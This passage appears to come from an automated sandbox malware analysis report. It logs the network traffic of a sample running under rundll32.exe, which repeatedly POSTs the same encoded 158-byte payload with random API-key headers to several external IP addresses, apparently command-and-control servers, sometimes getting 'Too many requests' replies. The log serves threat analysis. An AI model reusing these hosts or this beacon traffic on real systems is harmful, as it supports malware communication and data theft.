    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.54971377.238.229.63806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:50:59.785394907 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Kg6JyYbW
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.54971477.238.229.63801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:01.167155981 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: z2Xzv1Cn
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.54971577.238.250.123806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:01.896954060 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Kfz6N6A8
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:02.290771008 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:02 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.54971677.238.250.123801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:02.844525099 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: nj2YfkTv
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:03.391365051 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:03 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.549717195.2.70.38806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:03.965400934 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: uhN0gLUg
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.54971891.142.74.28806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:05.709209919 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: o7SaWr3Y
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    12192.168.2.54972277.238.224.56806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:07.453811884 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: UhHxW3e1
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    13192.168.2.54972577.238.229.63806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:09.083657026 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: S2xgNF8m
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    14192.168.2.54972777.238.250.123806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:10.705878973 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: sVuhwGs3
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:11.313143015 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:11 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    15192.168.2.549728195.2.70.38806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:32.497910023 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: sIfHrafn
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    16192.168.2.549729195.2.70.38801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:33.587869883 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Nf3wk7U4
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    17192.168.2.54973091.142.74.28806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:34.255948067 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ATDhLw6w
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    18192.168.2.54973191.142.74.28801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:35.293457985 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Zkenh3CY
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    19192.168.2.54973277.238.224.56806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:36.043051958 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: HgbkLws5
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    20192.168.2.54973377.238.224.56801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:37.048932076 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: I1t5Miuh
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    21192.168.2.54973477.238.229.63806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:37.628230095 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: pFsqKT3N
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    22192.168.2.54973577.238.229.63801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:38.674495935 CEST295OUTPOST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: f6xiHrqv
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    23192.168.2.54973677.238.250.123806580C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:39.253839016 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: xA06voUp
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:39.871294022 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:39 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    24192.168.2.54973777.238.250.123801216C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:40.328762054 CEST296OUTPOST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: CCU8DIdm
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:51:40.939387083 CEST183INHTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:51:40 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    25192.168.2.549738195.2.70.38806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:41.322577953 CEST293OUTPOST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: zqG2mfyC
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    26192.168.2.54973991.142.74.28806516C:\Windows\SysWOW64\rundll32.exe
    TimestampBytes transferredDirectionData
    Jul 15, 2024 12:51:43.060127974 CEST294OUTPOST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: t1wbsKRa
    Accept-Encoding: gzip
